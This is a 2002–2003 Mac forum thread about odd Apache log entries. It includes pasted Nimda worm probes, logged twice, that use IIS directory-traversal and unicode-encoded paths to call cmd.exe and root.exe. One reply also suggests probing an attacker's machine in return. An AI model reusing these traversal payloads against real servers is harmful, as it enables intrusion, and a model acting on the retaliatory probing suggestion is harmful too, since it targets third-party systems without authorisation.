Welcome to the MacNN Forums.

If this is your first visit, be sure to check out the FAQ by clicking the link above. You may have to register before you can post: click the register link above to proceed. To start viewing messages, select the forum that you want to visit from the selection below.

You are here: MacNN Forums > Software - Troubleshooting and Discussion > macOS > strange contents in httpd log

strange contents in httpd log
Thread Tools
kamprath
Junior Member
Join Date: Apr 2000
Location: San Francisco, CA
Status: Offline
Reply With Quote
Jun 29, 2002, 04:43 PM
 
I have a (very) large number of the following log entries in my httpd access_log file:

</font><blockquote><font size="1" face="Geneva, Verdana, Arial, sans-serif">code:</font><hr /><pre style="font-size:x-small; font-family: monospace;">127.0.0.1 - - [29/Jun/2002:13:35:27 -0700] &quot;GET /server-status&quot; 200 4327 &quot;-&quot; &quot;-&quot;</pre><hr /></blockquote><font size="1" face="Geneva, Verdana, Arial, sans-serif">Does anybody know what and why they are?

TIA!
--
Michael F. Kamprath
     
Camelot
Mac Elite
Join Date: May 1999
Location: San Jose, CA
Status: Offline
Reply With Quote
Jun 29, 2002, 09:37 PM
 
</font><blockquote><font size="1" face="Geneva, Verdana, Arial, sans-serif">quote:</font><hr /><font size="1" face="Geneva, Verdana, Arial, sans-serif">Originally posted by kamprath:
<strong>I have a (very) large number of the following log entries in my httpd access_log file:

</font><blockquote><font size="1" face="Geneva, Verdana, Arial, sans-serif">code:</font><hr /><pre style="font-size:x-small; font-family: monospace;">127.0.0.1 - - [29/Jun/2002:13:35:27 -0700] &quot;GET /server-status&quot; 200 4327 &quot;-&quot; &quot;-&quot;</pre><hr /></blockquote><font size="1" face="Geneva, Verdana, Arial, sans-serif">Does anybody know what and why they are?

TIA!</strong></font><hr /></blockquote><font size="1" face="Geneva, Verdana, Arial, sans-serif">The 127.0.0.1 at the beginning of the line indicates that the hits are coming from your own machine - presumably some watchdog process is monitoring Apache's status so that it will restart Apache should it crash.
Gods don't kill people - people with Gods kill people.
     
Kristoff
Mac Elite
Join Date: Sep 2000
Location: in front of the keyboard
Status: Offline
Reply With Quote
Jun 30, 2002, 01:41 AM
 
You think that's strange???

You should see ol' Nimda at work...

cmd.exe??? Not on this OS

24.221.99.90 - - [25/Jun/2002:14:03:40 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:41 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:42 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:46 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:49 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:52 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.
0" 404 338 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:53 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.
0" 404 338 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:56 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sys
tem32/cmd.exe?/c+dir HTTP/1.0" 404 354 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:56 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:57 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:04:00 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:04:03 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:04:07 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:04:10 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:04:14 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-
"
24.221.99.90 - - [25/Jun/2002:14:04:15 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
signatures are a waste of bandwidth
especially ones with political tripe in them.
     
IUJHJSDHE
Mac Elite
Join Date: Aug 2001
Location: Australia
Status: Offline
Reply With Quote
Jul 1, 2002, 01:54 AM
 
</font><blockquote><font size="1" face="Geneva, Verdana, Arial, sans-serif">quote:</font><hr /><font size="1" face="Geneva, Verdana, Arial, sans-serif">Originally posted by Kristoff:
<strong>You think that's strange???

You should see ol' Nimda at work...

cmd.exe??? Not on this OS

24.221.99.90 - - [25/Jun/2002:14:03:40 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 299 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:41 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 297 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:42 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:46 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:49 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:52 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.
0" 404 338 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:53 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.
0" 404 338 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:56 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sys
tem32/cmd.exe?/c+dir HTTP/1.0" 404 354 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:56 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:03:57 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:04:00 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:04:03 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:04:07 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:04:10 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304 "-" "-"
24.221.99.90 - - [25/Jun/2002:14:04:14 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-
"
24.221.99.90 - - [25/Jun/2002:14:04:15 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"</strong></font><hr /></blockquote><font size="1" face="Geneva, Verdana, Arial, sans-serif">Hehe, I hate those, but it's always funny looking at it from an apache log.

Hehe stupid windows
     
benbargagliotti
Junior Member
Join Date: Nov 2001
Status: Offline
Reply With Quote
Jul 17, 2003, 01:35 AM
 
I was just about to post a question concerning those same log entries, from the nimda virus. I was wondering what those were. Should I ban IP addresses? does it matter? thanks

ben
     
C.J. Moof
Mac Elite
Join Date: Aug 2001
Location: Madison, WI
Status: Offline
Reply With Quote
Jul 17, 2003, 02:08 PM
 
Originally posted by benbargagliotti:
I was just about to post a question concerning those same log entries, from the nimda virus. I was wondering what those were. Should I ban IP addresses? does it matter? thanks

ben
There's no point banning IP addresses. There's a fantastic number of machines on the net spewing out nimda and code red as we speak. If you're not running Windows systems, you can just disregard them- they're harmless noise to our boxes.

Here's what I say is fun- put on HenWen and get an alert up anytime any "bad" (user defined) traffic hits your machine. You'll be told the moment that code red/nimda, ect try to get in, when you're port scanned, all sorts of info. You'll see the moment someone does a port scan, so you can pop up their IP and poke around their machine in return.
OS X: Where software installation doesn't require wizards with shields.
     
   
 
Forum Links
Forum Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Top
Privacy Policy
All times are GMT -4. The time now is 09:41 PM.
All contents of these forums © 1995-2017 MacNN. All rights reserved.
Branding + Design: www.gesamtbild.com
vBulletin v.3.8.8 © 2000-2017, Jelsoft Enterprises Ltd.,